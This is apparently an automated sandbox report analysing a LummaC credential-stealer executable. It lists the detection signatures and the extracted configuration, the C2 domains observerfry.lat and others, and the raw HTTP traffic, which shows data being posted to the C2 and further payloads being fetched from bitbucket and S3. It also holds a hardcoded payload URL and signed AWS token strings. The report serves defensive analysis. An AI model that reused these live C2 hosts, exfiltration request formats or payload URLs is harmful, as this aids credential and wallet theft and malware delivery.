Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tTGxYWtjG5.exe

Overview

General Information

Sample name:tTGxYWtjG5.exe
renamed because original name is a hash value
Original sample name:6e0e190ce94e8017d60243ed97725433.exe
Analysis ID:1580288
MD5:6e0e190ce94e8017d60243ed97725433
SHA1:d849deb5f2b530ae73dbff0425c3c1580023b284
SHA256:2e664bc54aa4050db04b9c39dbd3acdbeda05049ecf4a4642ba6bd3cb28aaef3
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • tTGxYWtjG5.exe (PID: 424 cmdline: "C:\Users\user\Desktop\tTGxYWtjG5.exe" MD5: 6E0E190CE94E8017D60243ED97725433)
    • WerFault.exe (PID: 7788 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 1840 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": "https://observerfry.lat/api", "Build Version": "LOGS11--LiveTraffi"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000001.00000003.1474101580.000000000087D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        00000001.00000003.1436505307.0000000000864000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000001.00000003.1436316095.000000000081E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000001.00000003.1436238542.0000000000859000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000001.00000003.1473906680.000000000087D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                Click to see the 5 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T08:50:36.751774+010020283713Unknown Traffic192.168.2.749700172.67.199.72443TCP
                2024-12-24T08:50:39.107570+010020283713Unknown Traffic192.168.2.749701172.67.199.72443TCP
                2024-12-24T08:50:41.644366+010020283713Unknown Traffic192.168.2.749703172.67.199.72443TCP
                2024-12-24T08:50:44.014207+010020283713Unknown Traffic192.168.2.749709172.67.199.72443TCP
                2024-12-24T08:50:46.387851+010020283713Unknown Traffic192.168.2.749715172.67.199.72443TCP
                2024-12-24T08:50:49.316664+010020283713Unknown Traffic192.168.2.749721172.67.199.72443TCP
                2024-12-24T08:50:53.077105+010020283713Unknown Traffic192.168.2.749735172.67.199.72443TCP
                2024-12-24T08:50:57.960121+010020283713Unknown Traffic192.168.2.749746172.67.199.72443TCP
                2024-12-24T08:51:00.502738+010020283713Unknown Traffic192.168.2.749752185.166.143.48443TCP
                2024-12-24T08:51:03.017871+010020283713Unknown Traffic192.168.2.74975816.15.177.52443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T08:50:37.858563+010020546531A Network Trojan was detected192.168.2.749700172.67.199.72443TCP
                2024-12-24T08:50:39.879144+010020546531A Network Trojan was detected192.168.2.749701172.67.199.72443TCP
                2024-12-24T08:50:58.745276+010020546531A Network Trojan was detected192.168.2.749746172.67.199.72443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T08:50:37.858563+010020498361A Network Trojan was detected192.168.2.749700172.67.199.72443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T08:50:39.879144+010020498121A Network Trojan was detected192.168.2.749701172.67.199.72443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T08:50:42.654775+010020480941Malware Command and Control Activity Detected192.168.2.749703172.67.199.72443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: tTGxYWtjG5.exeAvira: detected
                Source: 00000001.00000002.1910955173.0000000000866000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": "https://observerfry.lat/api", "Build Version": "LOGS11--LiveTraffi"}
                Source: tTGxYWtjG5.exeReversingLabs: Detection: 68%
                Source: tTGxYWtjG5.exeVirustotal: Detection: 51%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: tTGxYWtjG5.exeJoe Sandbox ML: detected
                Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: bashfulacid.lat
                Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: tentabatte.lat
                Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: curverpluch.lat
                Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: talkynicer.lat
                Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: shapestickyr.lat
                Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: manyrestro.lat
                Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: slipperyloo.lat
                Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: wordyfindy.lat
                Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: observerfry.lat
                Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: LOGS11--LiveTraffic
                Source: tTGxYWtjG5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 16.15.177.52:443 -> 192.168.2.7:49758 version: TLS 1.2

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49703 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49701 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49746 -> 172.67.199.72:443
                Source: Malware configuration extractorURLs: https://observerfry.lat/api
                Source: Joe Sandbox ViewIP Address: 172.67.199.72 172.67.199.72
                Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49721 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49746 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49752 -> 185.166.143.48:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49758 -> 16.15.177.52:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49735 -> 172.67.199.72:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XGZGWN69Z4LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12808Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6AMRFSH27T1LETNRWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15076Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=H7PJEKSB2A4NV42C9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20401Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L01YY37EQMFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1218Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WX12WBHD86IUKHKE1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585769Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: observerfry.lat
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNAATU3DWE&Signature=CB%2FhJqRRscnPJ9O8Lh%2F9UJjvRsI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJIMEYCIQCmp4sJiJ2Vg6lV0IveQh7F4q5yllY1RSaQ%2FRcDZG8jLAIhAPOa65Thr25Wh%2Bug0HyKJXl55OoT1s0rFYCYSSkigJNCKrACCOn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwDuXuwpnkzPvUt7VoqhAIz%2BmwV7tES1WBaFS7IYWek7EXNAzdsYmQgkGyYrYxyA33m%2FJutt9lbP2U%2BMaAYuta1agrCmRKMj5pCeNx%2F%2FwHViPQ9O1Ned5SZGGKGYUIs5Bq6ktSFT%2BMOQ4n4hJi21TpAZk%2BO8TxTIusr5XqnH9VIGNA8dgL7jsf5ft4ir%2FWp2Hc2tIKVTm4EwHvhE8TCDJFhxF9IMnhSEQM1Wo1iIEeHRPK1a6jc18zDcHrHLu3Rf%2FTmzTrnBPx%2FWf4S5A%2F7CtkqMo29ARzMDm3VVSop46xM1Dz7%2FrkryEckuEuDtCT2F7eMPTxyXoW9PbRARoYCpJjbZ4p3lahtqL2qhmtVntLRTt6RNTCPz6m7BjqcAfpKPZ%2Bk48Y1M5IVUnLseVOnLKBZZZTFh9obbou77yeNXL9JcUQ1nOrkQPFNF%2BuaOyO%2FvQpad0BaYzg34uvur9Ge%2FjUPRr9wdY2fX83lmXUzA%2FYVdbRhgq47ryEnk02AY3mG17E8eX%2BqlW8mJlyvN80mj685f8rU0%2FU5eS3JeqKGbqyOm05scABsj1qVc5EsH31I3YZQ1CBRxp1CkA%3D%3D&Expires=1735028375 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNAATU3DWE&Signature=CB%2FhJqRRscnPJ9O8Lh%2F9UJjvRsI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJIMEYCIQCmp4sJiJ2Vg6lV0IveQh7F4q5yllY1RSaQ%2FRcDZG8jLAIhAPOa65Thr25Wh%2Bug0HyKJXl55OoT1s0rFYCYSSkigJNCKrACCOn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwDuXuwpnkzPvUt7VoqhAIz%2BmwV7tES1WBaFS7IYWek7EXNAzdsYmQgkGyYrYxyA33m%2FJutt9lbP2U%2BMaAYuta1agrCmRKMj5pCeNx%2F%2FwHViPQ9O1Ned5SZGGKGYUIs5Bq6ktSFT%2BMOQ4n4hJi21TpAZk%2BO8TxTIusr5XqnH9VIGNA8dgL7jsf5ft4ir%2FWp2Hc2tIKVTm4EwHvhE8TCDJFhxF9IMnhSEQM1Wo1iIEeHRPK1a6jc18zDcHrHLu3Rf%2FTmzTrnBPx%2FWf4S5A%2F7CtkqMo29ARzMDm3VVSop46xM1Dz7%2FrkryEckuEuDtCT2F7eMPTxyXoW9PbRARoYCpJjbZ4p3lahtqL2qhmtVntLRTt6RNTCPz6m7BjqcAfpKPZ%2Bk48Y1M5IVUnLseVOnLKBZZZTFh9obbou77yeNXL9JcUQ1nOrkQPFNF%2BuaOyO%2FvQpad0BaYzg34uvur9Ge%2FjUPRr9wdY2fX83lmXUzA%2FYVdbRhgq47ryEnk02AY3mG17E8eX%2BqlW8mJlyvN80mj685f8rU0%2FU5eS3JeqKGbqyOm05scABsj1qVc5EsH31I3YZQ1CBRxp1CkA%3D%3D&Expires=1735028375 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: global trafficDNS traffic detected: DNS query: observerfry.lat
                Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
                Source: tTGxYWtjG5.exe, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.000000000085E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
                Source: tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.000000000085E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeN/-
                Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: tTGxYWtjG5.exe, 00000001.00000002.1916296960.0000000005B99000.00000002.00000800.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                Source: Amcache.hve.11.drString found in binary or memory: http://upx.sf.net
                Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: tTGxYWtjG5.exeString found in binary or memory: https://aui-cdn.atlassia
